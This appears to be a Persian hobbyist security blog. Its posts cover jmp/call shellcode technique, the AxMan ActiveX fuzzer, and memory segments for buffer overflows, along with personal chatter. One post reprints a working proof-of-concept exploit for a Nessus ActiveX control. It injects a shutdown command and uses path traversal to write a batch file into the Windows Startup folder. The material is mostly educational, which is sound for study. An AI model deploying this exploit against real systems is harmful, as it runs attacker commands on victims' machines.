جستارهایی در وادی امنیت
درود
بروبچ IT قبول شدم!!!!
منتظر اطلعیه بعدی باشید!!!!
بزودی در دریای مقالات غرق یا خفه خواهید شد!!!!
جییییییییییییییییییییییگر همتون!!!!!!!!!!
من الان حالم زیاد خوش نیست!!!!!!!!!!!!!!
————————–
قربون همتون!!! — شدیدا” منو شرمنده کردید!!!
درود بر شما خوانندگان خوشگل من
امروز میخواهم کمی در مورد دستور های Call و Jmp با شما صحبت کنم.پس از خواندن این متن کوتاه شما آشنایی مختصری با دستور Jmp ، Call و RET پیدا خواهید کرد.استفاده از این دستورات یکی از معقول ترین روش ها در شل کدینگ است.فعلا اجماعا” صلوت ،الا… .
دستور Call در CPU های اینتل بسیار شبیه دستور Jmp است. وقتی دستور Call اجرا میشود ، ابتدا ESP به داخل پشته Push میشود و سپس پرشی به سمت تابع که به صورت یک آرگومان میرسد ، انجام میشود.تابعی که صدا زده شده است میتواند از دستور ret استفاده کرده و مانع به تعویق افتادن اجرای برنامه شود.او با این کار اجرای برنامه را به آفست بعد از دستور Call هدایت میکند.
دستور Ret آدرس بازگشتی را که توسط Call در پشته ذخیره شده است را گرفته و سپس به آن پرش میکند.
۱ main:
2
3 call func1
4 …
۵ …
۶ func1:
7 …
۸ ret
وقتی تابع func1(خط ۳) صدا زده میشود ، ESP به داخل پسته PUSH میشود ، سپس پرشی به سمت تابع func1 (خط ۶ ) صورت میگیرد.وقتی تابع func1 اجرا میشود ، دستور ret با pop کردن آدرس بازگشت از داخل پشته ، به آن پرش میکند. که آن هم یعنی اجرای دستورات در خط ۴ و … .حال اگر ما بخواهیم شل کد ما از یک System Call استفاده کن که آن هم به عنوان آرماگون یک رشته را میپذیرد ، چه باید بکنیم؟ ما میتوانیم آدرس رشته خود را در حافظه به دست آورده و به آن پرش کنیم.
۱ jmp short data
2 code:
3 pop esi
4 ;
5 data:
6 call code
7 db ‘Burb’
خط اول به قطعه data پرش کرده و سپس تابع code را در خط ۶ صدا میزند. نتیجه ی Call به ما نشان میدهد که پشته به کجا اشاره میکند. به قسمتی از حافظه اشاره میکند که ‘burb’ به آنجا Push شده است. در خط ۳ ما قسمتی از حافظه پشته را گرفته و در ثابت ESI ذخیره میکنیم.این ثابت اکنون حاوی اشاره گری به اطلاعات ذکر شده(’burb’) است.اکنون این سوال پیش میآید که Jmp چگونه متوجه میشود که داده ها در کجا قرار دارند؟دستور های Jmp و Call با آفست ها کار میکنند.کامپایلر دستور Jmp short data را به دستوری شبیه Jmp short 0×4 . مقدار ۰×۴ نشان دهنده تعداد بایتی است که باید به سمت جلو پرش کرد.تموم!!!
فعلا تا همینجا کافی است ، بنده همی در حال دق ( Degh ) کردن بودم!!! اوف بالاخره دوباره نوشتم.در ضمن اینجا صاحب دارد ، صاحبش نیز به حمدالله در قید حیات است ، پس لطفا پس از کپی-پیست مطلب ، نامی از نویسنده مذکور بفرمایید.نکته دیگر اینکه ، نظرات شما مانند گذشته باعث شادی روح آن مرحوم ( صاحب ) و تسلی خاطر بازماندگان است.با تشکر ازتوجه شما ، این شوخی ها را به دل نگیرید ، صاحبش شیرین عقله!!! هاااا دیگه چی میخوای؟؟ آها راستی منو چنتا دوست دارید؟ اجماعا” الفتحه الصلوت … .
منبع : یه کتاب بود که اسم خفنی داشت ، راستی نماز و روزه هاتون قبول ، جیگر هر چی روزه داره رو بخورم ، البته بعد از افطار ، اخخخ من چقدر لوسم !!!راستی با نظراتون خیلی حال کردم! دم همتون گرم! منو وادار کردید دوباره بنویسم!!!
.::شهریار::.
قربون همه جیگیرایی که به من لطف دارن برم!
مشغول تالیف کتاب هستم! بزودی هم نسخه چاپی و هم الکترونیکی اونی میزارم براتون….
خبر :
RSS هم فعال شد !!! — پایین ساید بار — قسمت اطلاعات — هاااااااااااااا…
Oops!!
درود
بربچ حالم دیگه داره به هم میخوره!
هر کی از مامانش قهر کرده رفته یه تیم امنیتی زده!
به سر برید سیمرغ! امضای ملت رو ببنید!!!!!!!!!!!!!!
عجبا! تا حالا یارو مقاله به عمرش ندیده اسمه خورشو گزاشته ریسرچر!!!!!!!!!!
درضمن نظرتتون رو عشقه!
اینجوری باشه دیگه مطلب بی مطلب!
حا ما ندارم!
فردا کنکور دارم،برام دعا کنید!
درود
همراه با فایل یک دمو هم برای آنایی شما با یرنامه هست.
اطلاعات تکمیلی
عنوان اصلی : AxMan:web-based ActiveX fuzzing engine
درود
شما به اون dll انجکشن که براتون فیلمشو گذلشتم اهمیت که ندادین! عمرا جایی بتونید عین اونو یا اصلا آموزش در اون مورد پیدا کنید!
خب بریم سر کار خودمون.
[SUMMARY]
Axman یک موتور تحت وب برای فاز کردن ActiveX است.هدف Axman پیدا کردن آسیب پذیری در آبجک های COM است ، البته اونایی که از طریق IE اجرا میشن. در ضمن چون Axman بر تحت وب نشوشته شده ، با تغییرات امنیتی جزئی در هر مرورگر وبی میتونید نتیجه کار اونو ببینید.
نکته: Axman ساخته شده برای IE 6 هستش!!!
[DOWNLOAD]
میتونید آخرین ورژن یعنی ۱/۰/۰ رو دانلود کنید!
[DEMO]
یک دموی آنلاین هم از برنامه هست.البته اجرا کردن Axman بر روی سرور لوکال سرعت بیشتری داره
[CONTACT]
این برنامه نوشته شده H D More هست که :
hdm@metasploit.com
http://axfuzz.sf.net/
http://metasploit.com/users/hdm/tools/axman/
اطلاعات تکمیلی دیگه هم با دانلود Axman بخونید!
منابع : سازمان آب ،برق ، گاز وتلفن + همینجا + متااسپلویت
نکته:
کپی نه رایت : از این به بعد هر کس ، هر چغندری ، یا هر شفتالویی ، خواست از مطالب و عکس های اینجا < Unkn0wn > را به اسم خودش !!! در وبلاگ یا هر مستراحی کپی و پیست کد آزاد است و نیازی به گرفتن حلالیت ندارد ، باشد که رستگار و موفق شود !!
کپی رایت ، کپی نه رایت وبلاگ استاد بزرگ : کف خون بینگالو
درود
گفتم شاید واستون جالب باشه!
Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Code Execution
در یک dll به نام Scan.dll آسیب پذیری مشاهده میشه!
Classid:A47D5315-321D-4DEE-9DB3-18438023193B
و در تابع addsetConfig میبینیم:
Function addsetConfig (
ByVal nessus_name As String ,
ByVal value As String ,
ByVal group As String
) As Integer
و همچنین در تابع saveNessusRC میبینیم:
Function saveNessusRC (
ByVal fullname As String
) As Integer
و حالا :
<-HTML>
<-object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B">
<-script language="javascript">
obj.addsetConfig(’shutdown -t 1000 -s -c “hello world ;]” && pause’, ”, ”);
obj.saveNessusRC(”../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat”);
<-/script>
<-/HTML>
منبع اکسپلویت میلورم بود ! …
نظرات شما باعث شادی روح آن مرحوم و تسلی خاطر بازماندگان است.
درود بر ایرانیان نیک سرشت!
به یاد گذشته و زمانی که خودم هنوز با این مسائل آشنا نشده بودم ، مطلبی برای دوستانی که تازه با این مهم (سریز در بافر،پشته،هیپ) آشنا شده اند ،میگزارم.
در ضمن به شما توصیه میکنم [ezin]Perl Underground 4 را حتما مورد مطالعه قرار دهید!
بسی مایه خنده ما شد! مخصوصا قسمت DeltaHacking آن….
نکته : این مطالب ادامه دارد…
—————————————————-
حافظه رویداد ها[۱] از قسمت هایی تشکیل شده است که با هم آنها را مرور میکنیم.
قطعه کد[۲] :داده هایی که در این قسمت ، دستوراتی هستند که برای اسمبلر قابل فهم و اجرا هستند. کد های اجرا شده غیر خطی هستند ( رویه خاص و ثابتی را دنبال نیمکنند). آنها میتوانند کد ها را رد کنند ، پرش کنند و یا تابعی را صدا بزنند.از این رو ما اشاره گری به نام EIP یا اشاره گر دستورات داریم.این اشاره گر همیشه به کدی اشاره میکند که در عمل بعدی ، قرار است اجرا شود.
قطعه داده ها [۳] : فضایی برای متغییر ها و بافر های پویا و یا ایستا( در مورد این نوع بافر ها در مقالات قبلی اشاره های شده است) .
قطعه پشته [۴] : این قطعه برای فرستادن داده ها (آرماگون ها) به توابع و نگه داری متغییر های توابع استفاده میشود. و همانطور که میدانید ساختاری متفاوت با دیگر قسمت های حافظه دارید( توضیح داده شده است).
و باز هم همانطور که میدانید دستور PUSH یک عنصر را به بالای پشته اضافه کرده و توسط دستورPOP آخرین عنصر ورودی را از پشته خارج میکند( البته نه کاملا) و آن را در یکی از ثبات قرار میدهد.
۱-Processes Memory
2-Code Segment
3-Data Segment
4-Stack Segment
درود
الان که نگاه میکنم من تاهالا بیشتر از ۱۰ خط تو بلاگ ننوشتم!
هه هه ، هه هه هه…
لذت ببرید!
بارگزاری
درود
در این درس کلیپ شما م
یبینید ، خودتون ببینید!
————–
در مورد مقاله باید بگم با این که تمو شد اما فکر میکونم هنوز زوده!
آخه خیلی سنگین بود…
در ضمن اگه سوالی بود ،واگه جوابشو بلد بودم در خدمتم!
بارگزاری کلیپ
